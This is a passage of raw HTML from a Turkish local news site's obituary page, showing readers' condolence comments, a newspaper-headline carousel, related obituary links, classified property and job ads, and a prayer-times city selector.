thumbs_up"></span> Beğen (<abbr id="wh_comlike310110">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike310110" onclick="like(310110,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike310110">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_310114"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Yaman hasan</b> <small class="time">1 gün önce</small> <p class="text">ALLAH rahmet eylesin mekanı cennet olsun inşAllah Nur içinde yatsın</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Yaman hasan" id="310114"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like310114" onclick="like(310114,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike310114">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike310114" onclick="like(310114,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike310114">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_310115"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Şekerci Mehmet ve şaban</b> <small class="time">1 gün önce</small> <p class="text">Komşumuza Allah cc Gani Gani rahmet eylesin mekanı cennet olsun</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Şekerci Mehmet ve şaban" id="310115"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like310115" onclick="like(310115,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike310115">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike310115" onclick="like(310115,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike310115">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_310120"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>SÜLEYMAN ÇAKMANUS</b> <small class="time">1 gün önce</small> <p class="text">Allah rahmet eylesin mekanı cennet olsun kardesimin unutmadik unutmayacacagiz böylesine degerli sevgi dolu bir insanı hepimizin başı sağ olsun</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@SÜLEYMAN ÇAKMANUS" id="310120"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like310120" onclick="like(310120,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike310120">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike310120" onclick="like(310120,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike310120">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_310125"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Abdurrahim kin</b> <small class="time">1 gün önce</small> <p class="text">Allâh rahmet eylesin mekanı cennet olsun AMİN</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Abdurrahim kin" id="310125"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like310125" onclick="like(310125,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike310125">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike310125" onclick="like(310125,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike310125">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_310133"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Fatoş batmaz</b> <small class="time">1 gün önce</small> <p class="text">Mekânı nur olsun insAllah</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Fatoş batmaz" id="310133"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like310133" onclick="like(310133,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike310133">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike310133" onclick="like(310133,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike310133">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_310153"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Aliriza yürekli</b> <small class="time">20 saat önce</small> <p class="text">Allah rahmet eylesin mekanı cennet olsun inşAllah tüm sevenlerinin başı sagolsun</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Aliriza yürekli" id="310153"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like310153" onclick="like(310153,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike310153">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike310153" onclick="like(310153,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike310153">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> <div class="comment_box row-fluid" id="comment_310155"> <div class="span1"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" /></div> <div class="span11"> <b>Osman efeoglu</b> <small class="time">17 saat önce</small> <p class="text">Allah rahmet eylesin mekani cennet olsun inş âmin başınız sağolsun</p> <div class="buttons"> <div class="reply"><a href="javascript:void(0)" class="cevapla pull-left" rel="@Osman efeoglu" id="310155"><span class="glyphicons unshare"></span> Cevapla</a></div> <a href="javascript:void(0)" class="like pull-left like310155" onclick="like(310155,'ajax_comment_like.php?like', 0)"><span class="glyphicons thumbs_up"></span> Beğen (<abbr id="wh_comlike310155">0</abbr>)</a> <a href="javascript:void(0)" class="dislike pull-left dislike310155" onclick="like(310155,'ajax_comment_like.php?dislike', 1)"><span class="glyphicons thumbs_down"></span> Beğenmedim! (<abbr id="wh_comdislike310155">0</abbr>)</a> </div> </div> </div> <!-- //Yoruma ait cevaplanan yorumları listeleyelim --> <!-- Yoruma ait cevaplanan yorumları listeleyelim// --> </div> <!-- #comment_list --> <div class="row-fluid" style="margin-top:10px;"> <a href="javascript:void(0)" onclick="centerModal('http://www.elbistaninsesi.com/comment-read-haber-67346.html',630,500)" class="all_comments pull-right btn btn-warning">Tüm Yorumlar</a> </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/vefatlar/anma-hasim-orta-h67346.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <div class="gazeteler"> <div id="carousel-gazeteler" class="carousel gazeteler slide"> <div class="box header black"> <h5 class="glyphicons bookmark" style="text-align:left;">GAZETE MANŞETLERİ</h5> <!-- <div class="pull-right"> <ol class="carousel-indicators"> <li data-target="#carousel-gazeteler" data-slide-to="0" class="active"></li> <li data-target="#carousel-gazeteler" data-slide-to="1"></li> <li data-target="#carousel-gazeteler" data-slide-to="2"></li> <li data-target="#carousel-gazeteler" data-slide-to="3"></li> <li data-target="#carousel-gazeteler" data-slide-to="4"></li> <li data-target="#carousel-gazeteler" data-slide-to="5"></li> <li data-target="#carousel-gazeteler" data-slide-to="6"></li> </ol> </div> --> </div> <div class="box content"> <div class="carousel-inner"> <div class="item active"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/aksam" title="Akşam" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/aksam.jpg" alt="Akşam"/></div> <p>Akşam</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/dirilis-postasi" title="Diriliş Postası" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/dirilis-postasi.jpg" alt="Diriliş Postası"/></div> <p>Diriliş Postası</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dunya" title="Dünya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/dunya.jpg" alt="Dünya"/></div> <p>Dünya</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/dogru-haber" title="Doğru Haber" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/dogru-haber.jpg" alt="Doğru Haber"/></div> <p>Doğru Haber</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/gunes" title="Güneş" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/gunes.jpg" alt="Güneş"/></div> <p>Güneş</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/harbi-gazete" title="Harbi Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/harbi-gazete.jpg" alt="Harbi Gazete"/></div> <p>Harbi Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/karar" title="Karar" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/karar.jpg" alt="Karar"/></div> <p>Karar</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/korkusuz" title="Korkusuz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/korkusuz.jpg" alt="Korkusuz"/></div> <p>Korkusuz</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/ortadogu" title="Ortadoğu" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/ortadogu.jpg" alt="Ortadoğu"/></div> <p>Ortadoğu</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milli-gazete" title="Milli Gazete" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/milli-gazete.jpg" alt="Milli Gazete"/></div> <p>Milli Gazete</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/sozcu" title="Sözcü" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/sozcu.jpg" alt="Sözcü"/></div> <p>Sözcü</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/star" title="Star" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/star.jpg" alt="Star"/></div> <p>Star</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkiye" title="Türkiye" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/turkiye.jpg" alt="Türkiye"/></div> <p>Türkiye</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/turkgun" title="Türkgün" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/turkgun.jpg" alt="Türkgün"/></div> <p>Türkgün</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-akit" title="Yeni Akit" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/yeni-akit.jpg" alt="Yeni Akit"/></div> <p>Yeni Akit</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-asya" title="Yeni Asya" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/yeni-asya.jpg" alt="Yeni Asya"/></div> <p>Yeni Asya</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-birlik" title="Yeni Birlik" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/yeni-birlik.jpg" alt="Yeni Birlik"/></div> <p>Yeni Birlik</p> </a> </div> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/yenicag" title="Yeniçağ" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/yenicag.jpg" alt="Yeniçağ"/></div> <p>Yeniçağ</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yenisoz" title="Yenisöz" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/yenisoz.jpg" alt="Yenisöz"/></div> <p>Yenisöz</p> </a> </div> <div class="span2 "> <a href="http://www.elbistaninsesi.com/gazeteler/yeni-safak" title="Yeni Şafak" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/yeni-safak.jpg" alt="Yeni Şafak"/></div> <p>Yeni Şafak</p> </a> </div> </div><div class="item"> <div class="span2 gotc_fl"> <a href="http://www.elbistaninsesi.com/gazeteler/milat" title="Milat" > <div class="gazete-k"><img src="http://service.tebilisim.com/gazeteler/arsiv/2020-08-06//thumbs-150/milat.jpg" alt="Milat"/></div> <p>Milat</p> </a> </div> </div> </div> </div> <a class="fl_ carousel-control left" href="#carousel-gazeteler" data-slide="prev">&lsaquo;</a> <a class="fl_ carousel-control right" href="#carousel-gazeteler" data-slide="next">&rsaquo;</a> </div> </div> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/abdullah-kusmus-76-yasinda-h67355.html" title="Abdullah Küsmüş 76 Yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/abdullah_kusmus_76_yasinda_h67355_08fd3.jpg" alt="Abdullah Küsmüş 76 Yaşında" /> <span>Abdullah Küsmüş 76 Yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html" title="Hatice Ceran"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/hatice_ceran_h67352_5cdb1.jpg" alt="Hatice Ceran" /> <span>Hatice Ceran</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mustafa-colak-h67343.html" title="Anma/ Mustafa Çolak"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/anma_mustafa_colak_h67343_09819.jpg" alt="Anma/ Mustafa Çolak" /> <span>Anma/ Mustafa Çolak</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/akif-karakas-55-yasinda-h67333.html" title="Akif Karakaş 55 yaşında"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/akif_karakas_55_yasinda_h67333_236a3.jpg" alt="Akif Karakaş 55 yaşında" /> <span>Akif Karakaş 55 yaşında</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/hikmet-sag-h67332.html" title="Hikmet Sağ"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/hikmet_sag_h67332_7b02a.jpg" alt="Hikmet Sağ" /> <span>Hikmet Sağ</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/firinci-mustafa-caliskan-h67331.html" title="Fırıncı Mustafa Çalışkan"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/firinci_mustafa_caliskan_h67331_21c3c.jpg" alt="Fırıncı Mustafa Çalışkan" /> <span>Fırıncı Mustafa Çalışkan</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/haci-yilmaz-80-yasinda-h67326.html" title="Hacı Yılmaz 80 yaşında,"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/haci_yilmaz_80_yasinda_h67326_a4cd8.jpg" alt="Hacı Yılmaz 80 yaşında," /> <span>Hacı Yılmaz 80 yaşında,</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/vefatlar/anma-memet-ali-arslan-h67325.html" title="Anma / Memet Ali Arslan"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/08/anma_memet_ali_arslan_h67325_4de0b.jpg" alt="Anma / Memet Ali Arslan" /> <span>Anma / Memet Ali Arslan</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-12882.html" title="SATILIK TARLA" >SATILIK TARLA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-tarla-12882.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK TARLA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-sekreter-12872.html" title="Bayan Sekreter" >Bayan Sekreter</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-sekreter-12872.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bayan Sekreter" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-41-daire-12870.html" title="Satılık 4+1 Daire" >Satılık 4+1 Daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-41-daire-12870.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık 4+1 Daire" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sehir-merkezinde-daire-12869.html" title="ŞEHİR MERKEZİNDE DAİRE" >ŞEHİR MERKEZİNDE DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sehir-merkezinde-daire-12869.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ŞEHİR MERKEZİNDE DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-tepebasinda-12867.html" title="Satılık arsa tepebaşında" >Satılık arsa tepebaşında</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-tepebasinda-12867.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık arsa tepebaşında" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-tepebasinda-12866.html" title="Satılık arsa tepebaşında" >Satılık arsa tepebaşında</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-tepebasinda-12866.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık arsa tepebaşında" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-tepebasinda-440m2-12865.html" title="Satılık arsa tepebaşında 440m2" >Satılık arsa tepebaşında 440m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-tepebasinda-440m2-12865.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık arsa tepebaşında 440m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-akbas-sokakta-400m2-12859.html" title="Satılık arsa akbaş sokakta 400m2" >Satılık arsa akbaş sokakta 400m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-akbas-sokakta-400m2-12859.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık arsa akbaş sokakta 400m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/esentepede-satilik-486m2-arsa-12849.html" title="Esentepede satılık 486m2 arsa" >Esentepede satılık 486m2 arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/esentepede-satilik-486m2-arsa-12849.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Esentepede satılık 486m2 arsa" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-563m2-12848.html" title="Satılık arsa 563m2" >Satılık arsa 563m2</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-arsa-563m2-12848.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık arsa 563m2" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ogretmen-araniyor-12840.html" title="Öğretmen aranıyor" >Öğretmen aranıyor</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ogretmen-araniyor-12840.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Öğretmen aranıyor" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12839.html" title="SATİLİK DAİRE" >SATİLİK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12839.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATİLİK DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12838.html" title="SATİLİK DAİRE" >SATİLİK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12838.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATİLİK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12837.html" title="SATİLİK DAİRE" >SATİLİK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-12837.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATİLİK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kahve-deposu-12835.html" title="Kahve deposu" >Kahve deposu</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kahve-deposu-12835.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kahve deposu" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes">39.1B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers">97</a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option 